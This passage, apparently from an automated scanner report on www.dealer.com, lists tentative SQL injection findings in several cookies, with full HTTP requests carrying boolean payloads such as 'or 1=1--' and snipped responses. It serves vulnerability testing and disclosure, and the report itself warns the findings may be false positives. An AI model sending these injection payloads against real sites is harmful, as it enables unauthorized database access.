   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customer
...[SNIP]...

Request 2

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=117967680%20or%201%3d2--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20341
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002479; expires=Mon, 16-Apr-2012 01:07:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spo
...[SNIP]...
1.25. http://www.dealer.com/solutions/dealer-groups/media/uploads/page/loading.gif [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/dealer-groups/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the exp_last_visit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161%20and%201%3d1--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19926
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:06:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002419; expires=Mon, 16-Apr-2012 01:06:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>It was important that we aligned ourselves with a company that&#8217;s predicting the future.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" tit
...[SNIP]...

Request 2

GET /solutions/dealer-groups/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/dealer-groups/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161%20and%201%3d2--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002367; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A3%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.8.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20108
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002419; expires=Mon, 16-Apr-2012 01:06:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From an Enterprise Level, Dealer.com's products have saved me hours a month in gathering my reporting and understanding what our site is doing for us. </p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From website performance, to more visitors and more conversions, everything we were looking for improvement from has improved.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.
...[SNIP]...
1.26. http://www.dealer.com/solutions/media/uploads/page/loading.gif [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/media/uploads/page/loading.gif

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 45699625'%20or%201%3d1--%20 and 45699625'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002374; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.10.10.130300218245699625'%20or%201%3d1--%20

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20191
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:22:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003378; expires=Mon, 16-Apr-2012 01:22:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The changes we've noticed since we've switched over have been absolutely dramatic. Not only has our conversion rate increased but our time on site is up...people used to spend 4-5 minutes on our site, now it's almost 8. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We wanted to be a true eCommerce portal and other providers weren't able to do what we wanted. After searching, it was a complete no-brainer. Dealer.com has all the capabilities we needed.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a
...[SNIP]...

Request 2

GET /solutions/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002374; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.10.10.130300218245699625'%20or%201%3d2--%20

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20140
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:23:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003379; expires=Mon, 16-Apr-2012 01:22:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We've incorporated more of Dealer.com's products because everything we put in place has worked. I really feel like we've got a partner in Dealer.com. </p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video Smar
...[SNIP]...
1.27. http://www.dealer.com/solutions/media/uploads/page/loading.gif [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/media/uploads/page/loading.gif

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. The payloads 46541386%20or%201%3d1--%20 and 46541386%20or%201%3d2--%20 were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=130300237446541386%20or%201%3d1--%20; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.10.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19936
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003258; expires=Mon, 16-Apr-2012 01:20:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I really enjoy being able to go in and add a page, create the meta data for that page, and immediately have it show up. It has been tremendously helpful for us.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Webs
...[SNIP]...

Request 2

GET /solutions/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=130300237446541386%20or%201%3d2--%20; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fsolutions%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts%2Fonline-advertising%2Fsearch-engine-optimization%2F%22%3Bi%3A2%3Bs%3A25%3A%22%2Fsolutions%2Fdealer-groups%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.10.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19969
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003259; expires=Mon, 16-Apr-2012 01:20:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's CarFlix videos impressed me a lot because I don't have to go to more than one vendor for my video. </p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
